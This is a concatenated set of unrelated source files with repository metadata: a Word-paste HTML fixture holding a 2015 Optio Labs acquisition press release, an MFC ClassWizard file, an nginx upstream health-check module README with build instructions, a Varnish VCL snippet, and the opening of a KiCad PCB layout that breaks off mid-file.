QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Cambria; mso-ascii-font-family:Cambria; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Cambria; mso-hansi-theme-font:minor-latin;} </style> <![endif]--> </head> <body bgcolor="white" lang="EN-US" link="blue" vlink="purple" style="tab-interval:.5in"> <!--StartFragment--> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><span style="mso-no-proof:yes"><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/> </v:shapetype><v:shape id="Picture_x0020_2" o:spid="_x0000_i1025" type="#_x0000_t75" style='width:207pt;height:126pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file://localhost/Users/bengotow/Library/Caches/TemporaryItems/msoclip/0/clip_image001.png" o:title=""/> </v:shape><![endif]--><![if !vml]><img width="209" height="128" src="file://localhost/Users/bengotow/Library/Caches/TemporaryItems/msoclip/0/clip_image002.png" v:shapes="Picture_x0020_2"><![endif]></span><o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><o:p>&nbsp;</o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><o:p>&nbsp;</o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;">For immediate release<o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><o:p>&nbsp;</o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;">Media contact:<o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;">Christine Dunn<o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;">ArcPoint Strategic Communications<o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;">617.484.1660, x101<o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><a href="mailto:cdunn@arcpointstrategy.com">cdunn@arcpointstrategy.com</a><o:p></o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><o:p>&nbsp;</o:p></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><o:p>&nbsp;</o:p></p> <p class="MsoNormal" align="center" style="font-family: Cambria; mso-bidi-theme-font: minor-bidi; mso-style-qformat: yes; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; mso-style-unhide: no; mso-ascii-font-family: Cambria; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; text-align: center;"><b style="mso-bidi-font-weight: normal"><span style="mso-ascii-font-family:Cambria;mso-hansi-font-family:Cambria">Optio Labs Announces the Acquisition of Oculis Labs, and Names Oculis Founder, Dr. Bill Anderson, as Chief Product Officer <o:p></o:p></span></b></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><b style="mso-bidi-font-weight:normal"><span style="mso-ascii-font-family:Cambria;mso-hansi-font-family:Cambria"><o:p>&nbsp;</o:p></span></b></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><span style="mso-ascii-font-family:Cambria;mso-hansi-font-family: Cambria"><o:p>&nbsp;</o:p></span></p> <p class="MsoNormal" style="mso-ascii-font-family: Cambria; mso-style-unhide: no; mso-style-parent: ''; margin: 0in; margin-bottom: .0001pt; mso-pagination: widow-orphan; font-size: 12.0pt; font-family: Cambria; mso-style-qformat: yes; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: 'MS 明朝'; mso-fareast-theme-font: minor-fareast; mso-hansi-font-family: Cambria; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi;"><span style="mso-ascii-font-family:Cambria;mso-hansi-font-family: Cambria">Baltimore (April 8, 2015) – Optio Labs, </span>which creates technology products that make mobile devices more secure, <span style="mso-ascii-font-family:Cambria;mso-hansi-font-family:Cambria">announced that it has purchased Maryland-based security company Oculis Labs, and its CEO, Dr. Bill Anderson, will be joining the company as Chief Product Officer. Oculis is developer of the award-winning products PrivateEye and Chameleon. <o:p></o:p></span></p> <!--EndFragment--> </body> </html>
HTML
0
cnheider/nylas-mail
packages/client-app/spec/fixtures/paste/word-paste-out.html
[ "MIT" ]
; CLW file contains information for the MFC ClassWizard [General Info] Version=1 LastClass=CAboutDlg LastTemplate=CDialog NewFileInclude1=#include "stdafx.h" NewFileInclude2=#include "MFCSingle.h" LastPage=0 ClassCount=9 Class1=CMFCSingleApp Class2=CMFCSingleDoc Class3=CMFCSingleView Class4=CMainFrame Class9=CAboutDlg ResourceCount=7 Resource1=IDD_ABOUTBOX Resource2=IDR_MAINFRAME [CLS:CMFCSingleApp] Type=0 HeaderFile=MFCSingle.h ImplementationFile=MFCSingle.cpp Filter=N [CLS:CMFCSingleDoc] Type=0 HeaderFile=MFCSingleDoc.h ImplementationFile=MFCSingleDoc.cpp Filter=N [CLS:CMFCSingleView] Type=0 HeaderFile=MFCSingleView.h ImplementationFile=MFCSingleView.cpp Filter=C [CLS:CMainFrame] Type=0 HeaderFile=MainFrm.h ImplementationFile=MainFrm.cpp Filter=T [CLS:CAboutDlg] Type=0 HeaderFile=MFCSingle.cpp ImplementationFile=MFCSingle.cpp Filter=D [DLG:IDD_ABOUTBOX] Type=1 ControlCount=4 Control1=IDC_STATIC,static,1342177283 Control2=IDC_STATIC,static,1342308352 Control3=IDC_STATIC,static,1342308352 Control4=IDOK,button,1342373889 Class=CAboutDlg [MNU:IDR_MAINFRAME] Type=1 Class=CMainFrame Command3=ID_FILE_NEW Command4=ID_FILE_OPEN Command5=ID_FILE_SAVE Command6=ID_FILE_SAVE_AS Command7=ID_FILE_PRINT Command8=ID_FILE_PRINT_PREVIEW Command9=ID_FILE_PRINT_SETUP Command10=ID_FILE_MRU_FILE1 Command11=ID_APP_EXIT Command12=ID_EDIT_UNDO Command13=ID_EDIT_CUT Command14=ID_EDIT_COPY Command15=ID_EDIT_PASTE Command29=ID_VIEW_TOOLBAR Command30=ID_VIEW_STATUS_BAR Command32=ID_APP_ABOUT CommandCount=32 [ACL:IDR_MAINFRAME] Type=1 Class=CMainFrame Command1=ID_FILE_NEW Command2=ID_FILE_OPEN Command3=ID_FILE_SAVE Command4=ID_FILE_PRINT Command5=ID_EDIT_UNDO Command6=ID_EDIT_CUT Command7=ID_EDIT_COPY Command8=ID_EDIT_PASTE Command9=ID_EDIT_UNDO Command10=ID_EDIT_CUT Command11=ID_EDIT_COPY Command12=ID_EDIT_PASTE Command17=ID_NEXT_PANE Command18=ID_PREV_PANE CommandCount=21
Clarion
1
youngqqcn/WindowsNotes
MFC/day01/MFCSingle/MFCSingle.clw
[ "MIT" ]
= Name = '''nginx_http_upstream_check_module''' - support upstream health check with Nginx = Synopsis = <geshi lang="nginx"> http { upstream cluster { # simple round-robin server 192.168.0.1:80; server 192.168.0.2:80; check interval=5000 rise=1 fall=3 timeout=4000; #check interval=3000 rise=2 fall=5 timeout=1000 type=ssl_hello; #check interval=3000 rise=2 fall=5 timeout=1000 type=http; #check_http_send "HEAD / HTTP/1.0\r\n\r\n"; #check_http_expect_alive http_2xx http_3xx; } server { listen 80; location / { proxy_pass http://cluster; } location /status { check_status; access_log off; allow SOME.IP.ADD.RESS; deny all; } } } </geshi> = Description = Add the support of health check with the upstream servers. = Directives = == check == '''syntax:''' ''check interval=milliseconds [fall=count] [rise=count] [timeout=milliseconds] [default_down=true|false] [type=tcp|http|ssl_hello|mysql|ajp|fastcgi]'' '''default:''' ''none, if parameters omitted, default parameters are interval=30000 fall=5 rise=2 timeout=1000 default_down=true type=tcp'' '''context:''' ''upstream'' '''description:''' Add the health check for the upstream servers. The parameters' meanings are: * ''interval'': the check request's interval time. * ''fall''(fall_count): After fall_count check failures, the server is marked down. * ''rise''(rise_count): After rise_count check success, the server is marked up. * ''timeout'': the check request's timeout. * ''default_down'': set initial state of backend server, default is down. * ''port'': specify the check port in the backend servers. It can be different with the original servers port. Default the port is 0 and it means the same as the original backend server. * ''type'': the check protocol type: # ''tcp'' is a simple tcp socket connect and peek one byte. # ''ssl_hello'' sends a client ssl hello packet and receives the server ssl hello packet. # ''http'' sends a http request packet, receives and parses the http response to diagnose if the upstream server is alive. # ''mysql'' connects to the mysql server, receives the greeting response to diagnose if the upstream server is alive. # ''ajp'' sends a AJP Cping packet, receives and parses the AJP Cpong response to diagnose if the upstream server is alive. # ''fastcgi'' send a fastcgi request, receives and parses the fastcgi response to diagnose if the upstream server is alive. == check_http_send == '''syntax:''' ''check_http_send http_packet'' '''default:''' ''"GET / HTTP/1.0\r\n\r\n"'' '''context:''' ''upstream'' '''description:''' If you set the check type is http, then the check function will sends this http packet to check the upstream server. == check_http_expect_alive == '''syntax:''' ''check_http_expect_alive [ http_2xx | http_3xx | http_4xx | http_5xx ]'' '''default:''' ''http_2xx | http_3xx'' '''context:''' ''upstream'' '''description:''' These status codes indicate the upstream server's http response is ok, the backend is alive. == check_keepalive_requests == '''syntax:''' ''check_keepalive_requests num'' '''default:''' ''check_keepalive_requests 1'' '''context:''' ''upstream'' '''description:''' The directive specifies the number of requests sent on a connection, the default vaule 1 indicates that nginx will certainly close the connection after a request. == check_fastcgi_param == '''Syntax:''' ''check_fastcgi_params parameter value'' '''default:''' see below '''context:''' ''upstream'' '''description:''' If you set the check type is fastcgi, then the check function will sends this fastcgi headers to check the upstream server. The default directive looks like: <geshi lang="nginx"> check_fastcgi_param "REQUEST_METHOD" "GET"; check_fastcgi_param "REQUEST_URI" "/"; check_fastcgi_param "SCRIPT_FILENAME" "index.php"; </geshi> == check_shm_size == '''syntax:''' ''check_shm_size size'' '''default:''' ''1M'' '''context:''' ''http'' '''description:''' Default size is one megabytes. If you check thousands of servers, the shared memory for health check may be not enough, you can enlarge it with this directive. == check_status == '''syntax:''' ''check_status [html|csv|json]'' '''default:''' ''none'' '''context:''' ''location'' '''description:''' Display the health checking servers' status by HTTP. This directive should be set in the http block. You can specify the default display format. The formats can be `html`, `csv` or `json`. The default type is `html`. It also supports to specify the format by the request argument. Suppose your `check_status` location is '/status', the argument of `format` can change the display page's format. You can do like this: <geshi lang="bash"> /status?format=html /status?format=csv /status?format=json </geshi> At present, you can fetch the list of servers with the same status by the argument of `status`. For example: <geshi lang="bash"> /status?format=html&status=down /status?format=csv&status=up </geshi> Below it's the sample html page: <geshi lang="bash"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nginx http upstream check status</title> </head> <body> <h1>Nginx http upstream check status</h1> <h2>Check upstream server number: 1, generation: 3</h2> <table style="background-color:white" cellspacing="0" cellpadding="3" border="1"> <tr bgcolor="#C0C0C0"> <th>Index</th> <th>Upstream</th> <th>Name</th> <th>Status</th> <th>Rise counts</th> <th>Fall counts</th> <th>Check type</th> <th>Check port</th> </tr> <tr> <td>0</td> <td>backend</td> <td>106.187.48.116:80</td> <td>up</td> <td>39</td> <td>0</td> <td>http</td> <td>80</td> </tr> </table> </body> </html> Below it's the sample of csv page: <geshi lang="bash"> 0,backend,106.187.48.116:80,up,46,0,http,80 </geshi> Below it's the sample of json page: <geshi lang="bash"> {"servers": { "total": 1, "generation": 3, "server": [ {"index": 0, "upstream": "backend", "name": "106.187.48.116:80", "status": "up", "rise": 58, "fall": 0, "type": "http", "port": 80} ] }} </geshi> = Installation = Download the latest version of the release tarball of this module from [http://github.com/yaoweibin/nginx_upstream_check_module github] Grab the nginx source code from [http://nginx.org/ nginx.org], for example, the version 1.0.14 (see nginx compatibility), and then build the source with this module: <geshi lang="bash"> $ wget 'http://nginx.org/download/nginx-1.0.14.tar.gz' $ tar -xzvf nginx-1.0.14.tar.gz $ cd nginx-1.0.14/ $ patch -p1 < /path/to/nginx_http_upstream_check_module/check.patch $ ./configure --add-module=/path/to/nginx_http_upstream_check_module $ make $ make install </geshi> = Note = If you use nginx-1.2.1 or nginx-1.3.0, the nginx upstream round robin module changed greatly. You should use the patch named 'check_1.2.1.patch'. If you use nginx-1.2.2+ or nginx-1.3.1+, It added the upstream least_conn module. You should use the patch named 'check_1.2.2+.patch'. If you use nginx-1.2.6+ or nginx-1.3.9+, It adjusted the round robin module. You should use the patch named 'check_1.2.6+.patch'. If you use nginx-1.5.12+, You should use the patch named 'check_1.5.12+.patch'. If you use nginx-1.7.2+, You should use the patch named 'check_1.7.2+.patch'. The patch just adds the support for the official Round-Robin, Ip_hash and least_conn upstream module. But it's easy to expand my module to other upstream modules. See the patch for detail. If you want to add the support for upstream fair module, you can do it like this: <geshi lang="bash"> $ git clone git://github.com/gnosek/nginx-upstream-fair.git $ cd nginx-upstream-fair $ patch -p2 < /path/to/nginx_http_upstream_check_module/upstream_fair.patch $ cd /path/to/nginx-1.0.14 $ ./configure --add-module=/path/to/nginx_http_upstream_check_module --add-module=/path/to/nginx-upstream-fair-module $ make $ make install </geshi> If you want to add the support for nginx sticky module, you can do it like this: <geshi lang="bash"> $ svn checkout http://nginx-sticky-module.googlecode.com/svn/trunk/ nginx-sticky-module $ cd nginx-sticky-module $ patch -p0 < /path/to/nginx_http_upstream_check_module/nginx-sticky-module.patch $ cd /path/to/nginx-1.0.14 $ ./configure --add-module=/path/to/nginx_http_upstream_check_module --add-module=/path/to/nginx-sticky-module $ make $ make install </geshi> Note that, the nginx-sticky-module also needs the original check.patch. = Compatibility = * The module version 0.1.5 should be compatibility with 0.7.67+ * The module version 0.1.8 should be compatibility with Nginx-1.0.14+ = Notes = = TODO = = Known Issues = = Changelogs = == v0.3 == * support keepalive check requests * fastcgi check requests * json/csv check status page support == v0.1 == * first release = Authors = Weibin Yao(姚伟斌) ''yaoweibin at gmail dot com'' Matthieu Tourne = Copyright & License = This README template copy from [http://github.com/agentzh agentzh]. The health check part is borrowed the design of Jack Lindamood's healthcheck module [http://github.com/cep21/healthcheck_nginx_upstreams healthcheck_nginx_upstreams]; This module is licensed under the BSD license. Copyright (C) 2014 by Weibin Yao <yaoweibin@gmail.com> Copyright (C) 2010-2014 Alibaba Group Holding Limited Copyright (C) 2014 by LiangBin Li Copyright (C) 2014 by Zhuo Yuan Copyright (C) 2012 by Matthieu Tourne All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
MediaWiki
5
steamboatid/nginx
debian/modules/http-upstream-check/doc/README.wiki
[ "BSD-2-Clause" ]
backend docker_web { .host = "nginx"; .port = "80"; } sub vcl_recv { set req.backend_hint = docker_web; set req.http.Host = "magento.local"; }
VCL
3
lukaszlach/magento-docker
varnish/config/varnish.vcl
[ "BSD-2-Clause", "Unlicense" ]
(kicad_pcb (version 20171130) (host pcbnew 5.1.6-c6e7f7d~87~ubuntu16.04.1) (general (thickness 1.6) (drawings 6) (tracks 170) (zones 0) (modules 13) (nets 20) ) (page A4) (layers (0 F.Cu signal) (31 B.Cu mixed) (32 B.Adhes user) (33 F.Adhes user) (34 B.Paste user) (35 F.Paste user) (36 B.SilkS user) (37 F.SilkS user) (38 B.Mask user) (39 F.Mask user) (44 Edge.Cuts user) (45 Margin user) (46 B.CrtYd user) (47 F.CrtYd user) (48 B.Fab user hide) (49 F.Fab user hide) ) (setup (last_trace_width 0.25) (trace_clearance 0.2) (zone_clearance 0.508) (zone_45_only no) (trace_min 0.2) (via_size 0.8) (via_drill 0.4) (via_min_size 0.4) (via_min_drill 0.3) (uvia_size 0.3) (uvia_drill 0.1) (uvias_allowed no) (uvia_min_size 0.2) (uvia_min_drill 0.1) (edge_width 0.15) (segment_width 0.2) (pcb_text_width 0.3) (pcb_text_size 1.5 1.5) (mod_edge_width 0.15) (mod_text_size 1 1) (mod_text_width 0.15) (pad_size 1.524 1.524) (pad_drill 0.762) (pad_to_mask_clearance 0.051) (solder_mask_min_width 0.25) (aux_axis_origin 0 0) (visible_elements FFFFFF7F) (pcbplotparams (layerselection 0x010f0_ffffffff) (usegerberextensions false) (usegerberattributes false) (usegerberadvancedattributes false) (creategerberjobfile false) (excludeedgelayer true) (linewidth 0.100000) (plotframeref false) (viasonmask false) (mode 1) (useauxorigin false) (hpglpennumber 1) (hpglpenspeed 20) (hpglpendiameter 15.000000) (psnegative false) (psa4output false) (plotreference true) (plotvalue true) (plotinvisibletext false) (padsonsilk true) (subtractmaskfromsilk false) (outputformat 4) (mirror false) (drillshape 0) (scaleselection 1) (outputdirectory "")) ) (net 0 "") (net 1 GND) (net 2 /DN1) (net 3 /DN1_R) (net 4 /DP1_R) (net 5 /DP1) (net 6 /SENSE1) (net 7 /PP5000_VBUS) (net 8 /PP3300_REG) (net 9 PP3300) (net 10 /PULLUPDP) (net 11 /DP_RX) (net 12 /DN_RX) (net 13 /D_RX) (net 14 /PP3300_PU) (net 15 /USB_OE_L) (net 16 /SUS) (net 17 /DM_TX) (net 18 /DP_TX) (net 19 /SPD) (net_class Default "This is the default net class." (clearance 0.2) (trace_width 0.25) (via_dia 0.8) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) (add_net /DM_TX) (add_net /DN1) (add_net /DN1_R) (add_net /DN_RX) (add_net /DP1) (add_net /DP1_R) (add_net /DP_RX) (add_net /DP_TX) (add_net /D_RX) (add_net /PP3300_PU) (add_net /PP3300_REG) (add_net /PP5000_VBUS) (add_net /PULLUPDP) (add_net /SENSE1) (add_net /SPD) (add_net /SUS) (add_net /USB_OE_L) (add_net GND) (add_net PP3300) ) (module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5F5605DB) (at 93.98 53.34 90) (descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "capacitor handsolder") (path /5F5E7CAF) (attr smd) (fp_text reference C3 (at 0 2.54 90) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 100n (at 0 1.65 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0 90) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1)) (fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 1 GND)) (pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 9 PP3300)) (model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5F5605CA) (at 94.615 65.405) (descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator") (tags "capacitor handsolder") (path /5F5A28C5) (attr smd) (fp_text reference C2 (at -4.191 -0.254) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 100n (at 0 1.65) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (fp_line (start -1 0.6) (end -1 -0.6) (layer 